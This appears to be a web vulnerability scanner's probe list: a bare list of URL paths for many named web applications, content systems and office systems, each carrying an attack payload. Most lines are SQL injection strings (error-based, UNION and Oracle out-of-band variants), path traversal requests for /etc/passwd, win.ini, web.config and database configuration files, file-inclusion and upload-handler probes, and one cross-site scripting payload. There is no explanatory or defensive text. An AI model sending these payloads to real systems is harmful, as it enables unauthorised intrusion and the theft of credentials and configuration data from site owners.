/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
/web/SubmitLogin.do
/pic.aspx?classid=60)%20and%201=char(106)%20--
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/venus/AsVenusCA/desk/message/reply.asp
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/mx_form/order_save.php?form_id=5
/download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
/cms/web/testsql.jsp
/web/zwdt/jjj.BjcxServlet
/login.php?LOGIN_USER_INCLUDE=/etc/passwd
/cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/webUser/webUser!list.action
/logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/admin/annual/delete_leave.post.php
/admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
/admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
/admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/jdwm/cgi/getpwd.cgi
/public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
/public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/Ajax_Handle/UploadAttachmentHandler.ashx
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/public/editext/up/soundsave.asp
/public/AspUpload/upload.asp?path=../../upload&processid=1
/xyEmployee_checkLoginForUser.do?userName=reer
/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
/kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
/kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
/kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
/opensoft.asp?%69d=10%20and%201=2
/phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
/bmsltxDetail.do
/setAcceptance.do
/setAcceptance.do
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/nobom.php
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
/lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
/admin/Admin_Config.asp
/Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
/zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
/FileUpload
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/KS_Data/KesionCMS6.mdb
/KS_Data/KesionCMS7.mdb
/KS_Data/KesionCMS8.mdb
/KS_Data/KesionCMS9.mdb
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/Asearch.asp
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
/addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
/search.aspx
/servlet/fileOpenforms?filename=/index.jsp
/application/gzhd/bgxz/download.jsp?filename=/index.jsp
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/NewsList.asp
/ActivityList.asp
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/common/guestbook.php
/common/help.php
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/wap/index.php?a=newslist
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/admin/uploadFile.action
/Adminiscentertrator/AdmIndex.asp
/Adminiscentertrator/AdmLinkInsert.asp
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/NewsList.asp
/bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
/prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
/prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
/truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
/bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/webissue.asp
/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/nowwebissue.asp
/bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/prewebissue.asp
/epstar/servlet/RaqFileServer?action=save&fileName=test.txt
/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
/www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
/body/Function/download.asp?filepath=../download.asp&filename=download
/news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
/install/step4.aspx
/admin/Role/Role_List.aspx
/sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
/admin/operupload.asp
/member/findAddressById.json
/member/zoneNm.json
/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
/i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
/api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
/search.php
/opac/index.jsp?page=../web-inf/web.xml
/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
/account.t?op=showAccountList
/oa_server/App_Pages/App_page/News_add.aspx
/truexxgk/app/YsqgkController/smallQuery?type=1
/truexxgk/app/YsqgkController/smallQuery?type=1
/store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/UploadHandler.ashx
/index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
/class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
/admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
/post.php?act=phpok&id=12
/weixin/index.php?m=index&c=index
/work_flow/formOptJSPUpload.jsp?flag=1
/work_flow/formStartJSPUpload.jsp?flag=1
/admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
/public/editor/tpsc1.jsp?flag=sc
/outImg?imgPath=c:/boot.ini
/outImg?imgPath=/etc/passwd
/gsgl.asp?stype=
/common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/piw/Member/UploadMemberAttach.jsp
/piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
/piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
/cardload.jsp?filename=../etc/passwd&maininfo_id=-12
/systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
/show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
/news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
/OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
/Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
/wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
/answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
/member.php?act=updateinfo
/site56/LmsOrder/trackOrder.jspx
/house/ProcManage/WebHouse/HousePic.aspx
/CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
/FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
/loginverify.asp
/newssearch.cfm
/mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
/news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/down.aspx?Url=../web.config
/showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
/sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
/opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
/getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
/getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
/MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
/install/install.php.lock?step=2
